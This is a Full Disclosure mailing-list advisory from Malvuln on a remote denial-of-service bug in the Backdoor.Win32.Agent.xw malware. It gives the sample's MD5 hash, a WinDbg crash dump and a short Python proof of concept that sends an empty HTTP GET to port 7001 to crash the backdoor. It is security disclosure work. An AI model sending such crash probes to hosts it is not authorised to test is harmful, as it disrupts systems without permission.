
Date: Tue, 23 Feb 2021 22:03:34 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Agent.xw / Remote Null Ptr Dereference - Denial
	of Service

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/ed4242ad0274d3b311d8722f10b3abea.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Agent.xw (Null httpd 0.5.1)
Vulnerability: Remote Null Ptr Dereference - Denial of Service
Description: Sending an empty HTTP GET request triggers a null pointer
dereference and access violation leading to a crash of the backdoor malware.
Type: PE32
MD5: ed4242ad0274d3b311d8722f10b3abea
Vuln ID: MVID-2021-0107
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 02/23/2021

Memory Dump:
(1264.d0): Access violation - code c0000005 (first/second chance not
available)
eax=00000000 ebx=00000000 ecx=ffffffff edx=00000000 esi=00000003
edi=00000003
eip=7710ed3c esp=0266e844 ebp=0266e9d4 iopl=0         nv up ei pl nz na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00000206
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400          ret     14h


0:002> !analyze -v
*******************************************************************************
*
  *
*                        Exception Analysis
  *
*
  *
*******************************************************************************


FAULTING_IP:
Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+4ee4
00404ee4 8b420c          mov     eax,dword ptr [edx+0Ch]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00404ee4
(Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+0x00004ee4)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 0000000c
Attempt to read from address 0000000c

PROCESS_NAME:  Backdoor.Win32.Agent.xw.ed4242ad0274d3b311d8722f10b3abea.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  0000000c

READ_ADDRESS:  0000000c

FOLLOWUP_IP:
Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+4ee4
00404ee4 8b420c          mov     eax,dword ptr [edx+0Ch]

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  000000d0

BUGCHECK_STR:
 APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_ffffffff

PRIMARY_PROBLEM_CLASS:  NULL_CLASS_PTR_DEREFERENCE_FILL_PATTERN_ffffffff

DEFAULT_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE_FILL_PATTERN_ffffffff

LAST_CONTROL_TRANSFER:  from 004021f9 to 00404ee4

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
0266f160 004021f9 00000000 0266f220 00411558
Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+0x4ee4
0266f248 770e1659 00000008 00000000 ffffffff
Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+0x21f9
0266f288 770e13ee 00000000 770e13ee 00000000
ntdll!RtlpAllocateHeapInternal+0x259
0266f2e8 0040806c 03f204a0 0266f33c 004097f4 ntdll!RtlAllocateHeap+0x3e
0266f2f4 004097f4 0000000b 0266f318 0000000b
Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+0x806c
0266f33c 0040f08e 0266fe38 0041079c ffffffff
Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+0x97f4
0266f5d0 00401e48 0266fe30 0266f5f8 0266fe30
Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+0xf08e
0266ff80 76198654 03f202d0 76198630 b74a0958
Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+0x1e48
0266ff94 77104a77 03f202d0 35eaa03b 00000000
kernel32!BaseThreadInitThunk+0x24
0266ffdc 77104a47 ffffffff 77129ed6 00000000 ntdll!__RtlUserThreadStart+0x2f
0266ffec 00000000 004073db 03f202d0 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  ~2s; .ecxr ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+4ee4

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea

IMAGE_NAME:  Backdoor.Win32.Agent.xw.ed4242ad0274d3b311d8722f10b3abea.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  400acf83

FAILURE_BUCKET_ID:
 NULL_CLASS_PTR_DEREFERENCE_FILL_PATTERN_ffffffff_c0000005_Backdoor.Win32.Agent.xw.ed4242ad0274d3b311d8722f10b3abea.exe!Unknown

BUCKET_ID:
 APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_ffffffff_Backdoor_Win32_Agent_xw_ed4242ad0274d3b311d8722f10b3abea+4ee4



Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=7001


def doit():

    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    P="GET / HTTP/1.0"
    s.send(P)
    s.close()

    print("Backdoor.Win32.Agent.xw / Null Ptr Dereference DoS")
    print("MD5: ed4242ad0274d3b311d8722f10b3abea")
    print("By Malvuln");


if __name__=="__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
